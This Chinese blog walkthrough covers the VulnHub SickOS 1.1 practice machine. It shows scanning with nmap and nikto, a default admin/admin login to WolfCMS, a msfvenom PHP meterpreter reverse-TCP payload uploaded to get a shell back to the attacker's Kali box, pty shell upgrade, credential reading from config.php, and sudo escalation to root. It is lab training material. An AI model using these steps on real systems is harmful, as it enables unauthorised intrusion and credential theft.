Vulnhub系列:SickOS1.1

靶机地址:SickOS1.1

渗透思路:

  1. 信息收集

对于目标靶机进行扫描,可以利用nmap或arp-scan -l进行查询,查询到靶机后,探测其开放的端口,常见的端口21、22、80、3306、445等等,对于不同的端口进行不同的渗透考虑。如果有web端,下一步就是对web服务进行信息收集。

  1. web探测

web端进行探测,探测出常见的web漏洞,如弱口令、sql注入、文件上传、文件包含等漏洞,对目录进行爆破等等,这里可以使用到dirsearch或dirb进行目录爆破,可以利用wpscan进行对应wordpress CMS框架进行漏洞检测,也可使用nikto进行web端漏洞检测。

  1. web渗透

探测出漏洞后,在本地寻找相关exp进行漏洞利用,getshell等操作,有时也需要自己去构造相应的payload进行渗透。

  1. 提权

在getshell之后,往往都是低权限,能做的事情很少,故而需要找到服务器上可以提权的地方,常用的方式是收集服务器信息,看是否存在内核提权,或者就是本地的SUID的提权,再或者就是利用sudo -l去查看是否存在某些特定用户拥有root权限等

渗透过程:

kali本机ip为:192.168.56.104,对靶机地址的探测:arp-scan -l或使用nmap -sP 192.168.56.1/24

对端口进行探测:nmap -sS -sV -A -T5 192.168.56.122(靶机ip)

这边探测出,靶机存在22、3128、8080端口,其中3128的信息告诉我们这边进行代理,然后我们用nikto web扫描器对靶机进行扫描探测

发现了web端的PHP版本,目录下存在robots.txt,还发现了存在shellshock的漏洞,下面,设置代理,进行web访问

访问后发现什么都没有,利用插件发现了该网站是wolfcms框架,上网查了该框架的默认后台路径

192.168.56.122/wolfcms/?/admin

admin/admin弱口令进入了

之后浏览该页面有上传文件的按钮,这边就想到了文件上传漏洞

利用msfvenom 生成一个php的shell,命令为:

msfvenom -p php/meterpreter/reverse_tcp lhost=(kali ip) lport=4567(监听的端口) -f raw

生成好后将其复制到本地文件,署名php,然后在web端点击按钮进行文件上传

然后在kali开启msf,设置监听,在网页端访问上传的文件,则会反弹回一个shell

然后查看服务器是否安装python,利用which python或where python输入

python -c 'import pty;pty.spawn("/bin/bash")'

转变一个交互式shell,然后就是提权了。

尝试使用sudo -l查看,发现没有什么信息

下面就尝试linux信息收集,进行内核提权,发现了linux 3.11.0,ubuntu 12.04,这些信息可以先放到一边,看看有没有其他的信息

在进入这个web服务的目录后发现了config.php文件,一般这样的文件都存在用户名和密码,查看后发现数据库用户和密码

进行一番搜查后,也没什么有用的信息

想着看能不能利用这个密码进行root转换,输入后发现授权失败,查看后才得知,sickos是第一用户名,那就直接切换到sickos用户下

本以为提权成功,发现还是不对,于是再进行一波该用户的权限收集,发现存在个(All:All)

那就直接不客气,直接sudo -s,切换为root权限,进入root目录查看到flag

本次vulnhub的sickos1.1靶机渗透就结束了,后续会更新更多vulnhub靶机的渗透内容

  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值